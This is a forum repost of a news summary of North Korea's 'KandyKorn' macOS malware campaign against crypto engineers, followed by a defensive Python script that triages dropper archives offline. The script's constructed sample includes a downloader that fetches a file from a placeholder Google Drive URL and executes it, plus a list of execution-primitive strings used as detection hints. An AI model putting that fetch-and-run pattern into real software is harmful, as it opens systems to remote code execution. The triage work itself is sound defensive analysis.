Gandalf_The_Grey
A new macOS malware dubbed 'KandyKorn' has been spotted in a campaign attributed to the North Korean Lazarus hacking group, targeting blockchain engineers of a cryptocurrency exchange platform.
The attackers impersonate members of the cryptocurrency community on Discord channels to spread Python-based modules that trigger a multi-stage KandyKorn infection chain.
Elastic Security discovered and attributed the attacks to Lazarus based on overlaps with past campaigns concerning the employed techniques, network infrastructure, code-signing certificates, and custom Lazarus detection rules.
The attack begins on Discord, where the targets are socially engineered into downloading a malicious ZIP archive named 'Cross-platform Bridges.zip.'
The victim is misled into believing they are downloading a legitimate arbitrage bot designed for automated profit generation from cryptocurrency transactions.
Instead, the contained Python script ('Main.py') will import 13 modules from an equal number of scripts in the ZIP, launching the first payload, 'Watcher.py.'
Watcher.py is a downloader that unpacks and executes a second Python script named 'testSpeed.py' along with another Python file named 'FinderTools,' downloaded from a Google Drive URL.
FinderTools is a dropper that fetches and launches an obfuscated binary named 'SugarLoader,' which appears under two names and in two instances, as an .sld and a .log Mach-O executable.
SugarLoader establishes a connection with the command and control (C2) server to fetch the final payload, KandyKorn, and load it into memory using reflective binary loading.
Source: New macOS 'KandyKorn' malware targets cryptocurrency engineers (www.bleepingcomputer.com)
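The chain described in the article (a Python entry script importing a dozen sibling modules, a downloader that pulls the next stage from a Google Drive URL, and Mach-O binaries hiding behind .sld/.log extensions) is the kind of thing you can triage offline from the ZIP alone. The script below is an added example, not code from Elastic Security, BleepingComputer or the Lazarus toolkit: it maps the entry script's local imports, flags modules that combine a hard-coded URL with an execution primitive, and checks every non-Python member for a Mach-O magic number regardless of extension. The archive, file names, module names and the Google Drive URL are all constructed for the example, not real indicators from the campaign.

```python
"""Offline triage of a Python dropper archive of the shape described in the
KandyKorn write-up. Added example; sample archive and all names are constructed."""
import ast
import io
import re
import zipfile

# Mach-O magic numbers: 32/64-bit in both byte orders, plus fat (universal) binaries.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}
URL_RE = re.compile(rb"https?://[^\s'\"]+")
# Substrings that indicate a script executes what it fetched (downloader/dropper behaviour).
EXEC_HINTS = ("subprocess", "os.system", "os.popen", "exec(", "marshal", "compile(")


def local_imports(source: str, module_names: set) -> list:
    """Module names imported by `source` that are also shipped inside the archive."""
    found = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            found += [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            found.append(node.module)
    return [m for m in found if m in module_names]


def triage_zip(data: bytes, entry: str = "Main.py") -> dict:
    """Return a report with the entry script's local import chain, modules that
    download-and-execute, and files whose extension hides a Mach-O binary."""
    zf = zipfile.ZipFile(io.BytesIO(data))
    names = zf.namelist()
    py_modules = {n[:-3] for n in names if n.endswith(".py")}
    report = {"entry_imports": [], "downloaders": {}, "hidden_macho": []}
    if entry in names:
        report["entry_imports"] = local_imports(zf.read(entry).decode(), py_modules)
    for name in names:
        blob = zf.read(name)
        if name.endswith(".py"):
            urls = [u.decode() for u in URL_RE.findall(blob)]
            text = blob.decode(errors="replace")
            if urls and any(hint in text for hint in EXEC_HINTS):
                report["downloaders"][name] = urls
        elif blob[:4] in MACHO_MAGICS:
            # Extension says .log/.sld/.txt, magic says executable: the SugarLoader trick.
            report["hidden_macho"].append(name)
    return report


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the described layout (all names are assumptions)."""
    files = {
        "Main.py": "import json\nimport Watcher\nimport Utils\n\nWatcher.run()\n",
        "Watcher.py": (
            "import subprocess, urllib.request\n"
            "URL = 'https://drive.google.com/uc?id=EXAMPLE'  # constructed, not a real IOC\n"
            "def run():\n"
            "    urllib.request.urlretrieve(URL, '/tmp/FinderTools')\n"
            "    subprocess.call(['python3', '/tmp/FinderTools'])\n"
        ),
        "Utils.py": "def helper():\n    return 1\n",
        # A 64-bit little-endian Mach-O header under a harmless-looking extension.
        "updates.log": b"\xcf\xfa\xed\xfe" + b"\x00" * 28,
        "README.txt": b"arbitrage bot\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in triage_zip(build_sample_zip()).items():
        print(f"{key}: {value}")
```

The import map is what lets you walk the chain from Main.py to Watcher.py without running anything; the URL-plus-execution heuristic is deliberately loose (it will fire on legitimate updaters too), so treat its hits as a starting point for manual review rather than a verdict. Checking magic bytes instead of extensions is the part that matters most here, since the loader stage in the report was shipped under .sld and .log names.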